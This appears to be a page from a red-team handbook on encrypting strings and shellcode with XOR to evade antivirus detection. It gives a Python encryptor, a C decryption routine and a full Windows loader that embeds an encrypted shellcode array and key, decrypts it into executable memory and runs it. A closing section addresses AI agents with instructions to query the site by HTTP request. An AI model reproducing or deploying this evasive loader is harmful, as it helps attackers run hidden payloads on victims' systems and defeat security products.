# Encrypting Strings Strings are a big indicator of malware and are a big target of most AV's and security products. Here we will make use of encrypting your strings and shellcode to evade detection. We will use XOR encryption to hide our payloads. I have stolen a xor encryptor script from here: {% embed url="" %} This takes a shellcode bin file and xor encrypts it with a random key. ```python import sys import random import string import os import time def get_random_string(): # With combination of lower and upper case length = random.randint(8, 15) result_str = ''.join(random.choice(string.ascii_letters) for i in range(length)) # print random string return result_str def xor(data): key = get_random_string() l = len(key) output_str = "" for i in range(len(data)): current = data[i] current_key = key[i % len(key)] o = lambda x: x if isinstance(x, int) else ord(x) # handle data being bytes not string output_str += chr(o(current) ^ ord(current_key)) ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output_str) + ' };' print(ciphertext) print(key) try: plain = open(sys.argv[1], "rb").read() except: print("Failed to read payload file") xor(plain) ``` If you pass your file to this script, you should get a key and your encrypted shellcode in a byte array. To decrypt this, we can use this simple C function in our implants: ```python void XOR(char* data, size_t data_len, char* key, size_t key_len) { // https://github.com/9emin1/charlotte/blob/main/template.cpp int j = 0; for (int i = 0; i < data_len; i++) { if (j == key_len - 1) { j = 0; } data[i] = data[i] ^ key[j]; j++; } } ``` Example of using this XOR function is: ```cpp #include #include #include #include char shellcode[] = { 0x86, 0x32, 0xda, 0x95, 0xb1, 0xbb, 0x82, 0x4c, 0x77, 0x7a, 0x35, 0x4, 0xe, 0x2a, 0x28, 0x8, 0x27, 0x9, 0x62, 0x90, 0x29, 0x3f, 0xf1, 0x26, 0x35, 0x7, 0xf1, 0x28, 0x41, 0x39, 0xca, 0x1, 0x62, 0x4, 0xfc, 0x8, 0x24, 0x1d, 0x40, 0xcd, 0x30, 0x13, 0x3c, 0x70, 0x9a, 0xa, 0x7d, 0xb7, 0xd6, 0x48, 0x34, 0x33, 0x78, 0x56, 0x79, 0x30, 0x80, 0x9a, 0x4f, 0xd, 0x76, 0xbb, 0x96, 0xb8, 0x1d, 0x3b, 0x2b, 0x11, 0xfa, 0x13, 0x73, 0xc9, 0xe, 0x4b, 0x32, 0x75, 0x85, 0xc4, 0xfa, 0xf2, 0x59, 0x71, 0x41, 0x1b, 0xc7, 0x8c, 0x3, 0x1d, 0x3c, 0x54, 0x9f, 0x2a, 0xf1, 0x11, 0x69, 0x5, 0xd8, 0x2, 0x6c, 0x3e, 0x7b, 0xa4, 0xb6, 0x19, 0x32, 0x85, 0x90, 0x30, 0xca, 0x67, 0xca, 0x4, 0x76, 0xac, 0x39, 0x64, 0x86, 0x32, 0x4b, 0x99, 0xdd, 0x0, 0x92, 0x8b, 0x41, 0x36, 0x7b, 0xb5, 0x6d, 0xaf, 0xf, 0x8b, 0x15, 0x72, 0xd, 0x77, 0x4a, 0x9, 0x4e, 0xab, 0x1, 0x8d, 0x17, 0x3e, 0xf1, 0x19, 0x55, 0x8, 0x52, 0x92, 0x2a, 0x36, 0xf1, 0x78, 0x1d, 0xb, 0xf1, 0x3a, 0x45, 0x38, 0x40, 0x83, 0x3, 0xc7, 0x73, 0xf2, 0x3c, 0x54, 0x9f, 0x3b, 0x22, 0x18, 0x29, 0x1f, 0xa, 0x18, 0xd, 0x2f, 0x3b, 0x2d, 0x14, 0x15, 0x32, 0xf9, 0xb5, 0x51, 0x0, 0x1, 0xbd, 0xac, 0x2f, 0x3b, 0x2d, 0xf, 0x7, 0xf1, 0x68, 0xb0, 0x26, 0xbe, 0xac, 0xbd, 0x11, 0x3f, 0xc0, 0x75, 0x55, 0x4f, 0x7a, 0x7a, 0x59, 0x71, 0x41, 0x1b, 0xcf, 0xc1, 0x76, 0x7b, 0x74, 0x55, 0xe, 0xc0, 0x4b, 0xd2, 0x1e, 0xc6, 0xac, 0x97, 0xf7, 0x97, 0x67, 0x5e, 0x5f, 0xe, 0xc0, 0xdc, 0xcc, 0xcc, 0xdc, 0xac, 0x97, 0x4, 0xf4, 0xbe, 0x5c, 0x69, 0x49, 0x6, 0x70, 0xd9, 0x8a, 0xa1, 0x26, 0x47, 0xf7, 0x30, 0x69, 0x6, 0x3a, 0x25, 0x7a, 0x23, 0x18, 0xf8, 0x9b, 0xac, 0x97, 0x2f, 0x16, 0x16, 0x17, 0x7b, 0x2a, 0x2, 0x1f, 0x59 }; int pay_len = sizeof(shellcode); void XOR(char* data, size_t data_len, char* key, size_t key_len) { // https://github.com/9emin1/charlotte/blob/main/template.cpp int j = 0; for (int i = 0; i < data_len; i++) { if (j == key_len - 1) { j = 0; } data[i] = data[i] ^ key[j]; j++; } } int main(void) { char key[] = "zzYqASBLwztUO"; void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); XOR((char*)shellcode, pay_len, key, sizeof(key)); memcpy(exec, shellcode, sizeof(shellcode)); getchar(); int (*run)() = (int(*)())(void*)exec; run(); return 0; } ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/basics/encrypting-strings.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.